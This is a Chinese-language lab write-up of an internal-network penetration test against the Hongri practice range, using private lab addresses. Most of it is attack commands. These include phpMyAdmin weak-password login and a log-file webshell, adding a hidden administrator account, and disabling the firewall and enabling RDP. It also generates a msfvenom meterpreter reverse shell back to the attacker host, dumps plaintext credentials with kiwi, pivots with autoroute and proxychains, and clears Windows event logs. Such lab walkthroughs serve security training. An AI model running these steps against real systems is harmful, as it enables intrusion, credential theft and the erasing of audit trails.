记一次内网渗透
红日靶场下载地址:漏洞详情
靶场地址分配:
模拟外网网段:192.168.174.0/24
模拟内网网段:192.168.52.0/24
攻击机:
kali:192.168.174.131
靶机:
域控服务器2008:192.168.52.138(内网)
域成员2003:192.168.52.141(内网)
Win7: 192.168.52.143(内网)
192.168.174.130(外网)
1.信息收集
使用nmap对192.168.174.130进行扫描
对目录进行扫描,发现phpmyadmin页面
2.GETSHELL
弱口令root/root登录界面
使用日志漏洞
开启日志功能,并设置日志路径
写入一句话木马,并用蚁剑链接
在后台建立新用户,并赋予管理员权限--权限维持
net user 账户 密码 /add 管理员权限,所有直接加 net localgroup administrators admin /add
3.后渗透
关闭防火墙
netsh advfirewall show allprofile state netsh advfirewall set allprofiles state off
开启3389
run post/windows/manage/enable_rdp rdesktop 192.168.174.130:3389
msf生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.131 LPORT=4444 -f exe -o brian.exe
将木马上传到肉鸡
开启msfconsole并监听:
use exploit/multi/handler
设置tcp监听:
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.174.131
exploit
运行肉鸡上的木马
信息查看
whoami # 查看当前用户名 whoami /all # 获取域SID ipconfig /all # 网络配置文件 route print # 打印路由信息 arp -a # 查看arp缓存,可以发现内网主机 systeminfo # 操作系统信息 echo %PROCESSOR_ARCHITECTURE% # 系统体系架构 tasklist /v # 本机进程 net statistics workstation # 主机开机时间 net user # 查看本地用户 net localgroup administrators # 查看本地管理员组(通常包含域用户) net user xxx # 查看指定用户详细信息
进程迁移
ps migrate 512 # 默认是加载32位的系统,所以如果目标主机是64位系统的话,需要将进程迁移到一个64位程序的进程中 load kiwi # 加载kiwi模块 creds_all # 列举系统中的明文密码
权限提升
4.横向移动
配置静态路由(可以后台运行,使用永恒之蓝打域控)
run autoroute 192.168.52.0/24
使用代理(为了在msf之外访问内网,只好设计一个代理)
设置代理服务器
配置代理文件
vim /etc/proxychains.conf
对内网进行端口扫描
5.清理痕迹
meterperter清除日志功能: clearev #清除windows中的应用程序日志、系统日志、安全日志